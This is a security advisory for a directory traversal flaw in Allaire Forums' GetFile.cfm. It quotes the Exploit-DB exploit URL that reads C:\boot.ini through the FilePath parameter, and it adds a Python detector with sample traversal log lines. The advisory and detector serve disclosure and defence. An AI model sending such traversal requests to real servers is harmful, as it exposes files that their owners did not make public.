Vendor: Allaire Forums
CVSS: 6.4 (MEDIUM)
CWE: 22 (Directory Traversal)
Product Name: Allaire Forums
Affected Version From: Forums 2.0.4 and earlier
Patch Exists: NO

Allaire Forums Directory Traversal Vulnerability

An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier.

Mitigation:

Apply the necessary patches or upgrade to a newer version to mitigate this vulnerability.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/229/info

An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier. 

Type the URL "GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini" (without the quotes), where C:\boot.ini is the pathname and file to read.

The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#"> 
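
A log check for the request pattern above, as an added example that is not part of the original advisory or Allaire's code: it flags GetFile.cfm requests whose FilePath resolves outside the directory the application is meant to serve. The root C:\Forums\Attachments, the log line layout and the sample lines are assumptions constructed for illustration.

```python
import ntpath
from urllib.parse import urlsplit, parse_qs

# Assumption: the only directory GetFile.cfm should ever read from.
ALLOWED_ROOT = r"C:\Forums\Attachments"

def escapes_root(file_path, root=ALLOWED_ROOT):
    """True if file_path, resolved Windows-style against root, lands outside root."""
    root_norm = ntpath.normcase(ntpath.normpath(root))
    # ntpath.join drops root when file_path is absolute (drive letter or UNC);
    # normpath then collapses any ".." segments before the prefix comparison.
    full = ntpath.normcase(ntpath.normpath(ntpath.join(root, file_path)))
    return not (full == root_norm or full.startswith(root_norm + "\\"))

def flag_getfile_requests(log_lines):
    """Return (client, FilePath) pairs for GetFile.cfm requests that leave the root."""
    hits = []
    for line in log_lines:
        # Assumed layout: client method uri status
        client, _method, uri, _status = line.split()
        url = urlsplit(uri)
        if not url.path.lower().endswith("/getfile.cfm"):
            continue
        # ColdFusion URL variable names are case-insensitive; parse_qs also
        # percent-decodes the values, so %5C is compared as a backslash.
        params = {k.lower(): v for k, v in parse_qs(url.query).items()}
        for value in params.get("filepath", []):
            if escapes_root(value):
                hits.append((client, value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    "198.51.100.10 GET /forums/GetFile.cfm?FT=Text&FST=Plain&FilePath=notes.txt 200",
    "203.0.113.7 GET /forums/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:%5Cboot.ini 200",
    "203.0.113.7 GET /forums/getfile.cfm?ft=Text&fst=Plain&filepath=..%5C..%5Cother%5Cfile.txt 200",
    "198.51.100.10 GET /forums/index.cfm 200",
]

if __name__ == "__main__":
    for client, path in flag_getfile_requests(SAMPLE_LOG):
        print(f"{client} requested a file outside {ALLOWED_ROOT}: {path}")
```

The same containment test, applied server-side before the file is read, is the check the CFCONTENT call lacks.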